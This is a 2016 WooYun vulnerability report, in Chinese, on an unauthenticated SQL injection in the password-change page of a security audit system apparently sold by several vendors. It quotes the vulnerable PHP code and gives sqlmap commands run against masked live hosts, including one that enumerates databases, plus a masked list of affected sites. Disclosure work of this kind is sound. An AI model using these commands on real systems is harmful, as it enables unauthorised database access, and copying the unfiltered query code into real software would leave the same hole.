当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(16) 关注此漏洞

缺陷编号: WooYun-2016-172855

漏洞标题: 某安全管理(审计)系统存在SQL注入(无需登录涉及网神&网御星云等众多安全厂商)

相关厂商: cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间: 2016-01-26 18:55

公开时间: 2016-01-28 17:30

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: php+数字类型注射 php源码分析

2人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-26: 细节已通知厂商并且等待厂商处理中
2016-01-29: 厂商已经确认,细节仅向厂商公开
2016-02-01: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-03-24: 细节向核心白帽子及相关领域专家公开
2016-04-03: 细节向普通白帽子公开
2016-04-13: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

某安全管理(审计)系统存在SQL注入(无需登录涉及网神&网御星云等众多安全厂商)

详细说明:

这些所谓的大安全厂商们,代码各种抄,互联网的安全令人堪忧。。

存在漏洞的文件为:

/autheditpwd.php (修改密码)

该文件的部分漏洞代码如下

code 区域
if(isset($_GET['id'])) $get_id = $_GET['id'];


if(isset($_POST['mode'])) $post_mode = $_POST['mode'];


if($post_mode == "edit"){


	conn();


	$post_id = $_POST['hid_id'];


	$post_oldpwd = $_POST['oldpwd'];


	$sql = "select * from tb_web_accounts where id = $post_id and user_pwd = '$post_oldpwd'";


	$result = mysql_query($sql);


	$num = mysql_num_rows($result);


	if($num	< 1)	//没有记录


	{


		alert("原密码不对","autheditpwd.php?id=$post_id");


		exit();


	}


	$post_pwd = $_POST['pwd'];


	$sql = "update tb_web_accounts set user_pwd = $post_pwd where id = $post_id";


	$result = mysql_query($sql);


	if(!$result)


	{


		alert("修改失败!","autheditpwd.php?id=$post_id");


		exit();


	}


	alert_close("修改成功!");


}



很明显,用户提交的参数hid_id没有任何的过滤便进入了sql查询,于是造成了sql注入漏洞

漏洞证明:

0x0 **.**.**.**:8443/(网神安全审计系统)

code 区域
sqlmap.py -u "**.**.**.**:8443/autheditpwd.php" --data "mode=edit&hid_id=1" -p hid_id --dbms mysql --technique T



0.png



0x1 **.**.**.**:8443/(网御上网行为管理系统)

code 区域
sqlmap.py -u "**.**.**.**:8443/autheditpwd.php" --data "mode=edit&hid_id=1" -p hid_id --dbms mysql --technique T



1.png



0x2 **.**.**.**:8443/(网御上网行为管理系统)

code 区域
sqlmap.py -u "**.**.**.**:8443/autheditpwd.php" --data "mode=edit&hid_id=1" -p hid_id --dbms mysql --technique T



2.png



0x3 https://**.**.**.**:8443/

code 区域
sqlmap.py -u "https://**.**.**.**:8443/autheditpwd.php" --data "mode=edit&hid_id=1" -p hid_id --dbms mysql --technique T



3.png



采用sqlmap即可跑出数据,如下图所示:

code 区域
sqlmap.py -u "https://**.**.**.**:8443/autheditpwd.php" --data "mode=edit&hid_id=1" -p hid_id --dbms mysql --technique T --dbs



data.png



漏洞案例:

code 区域
网神


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/





网御


**.**.**.**:8443/


https://**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


https://**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


https://**.**.**.**:8443/


https://**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/


**.**.**.**:8443/

修复方案:

过滤吧

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-01-29 15:31

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录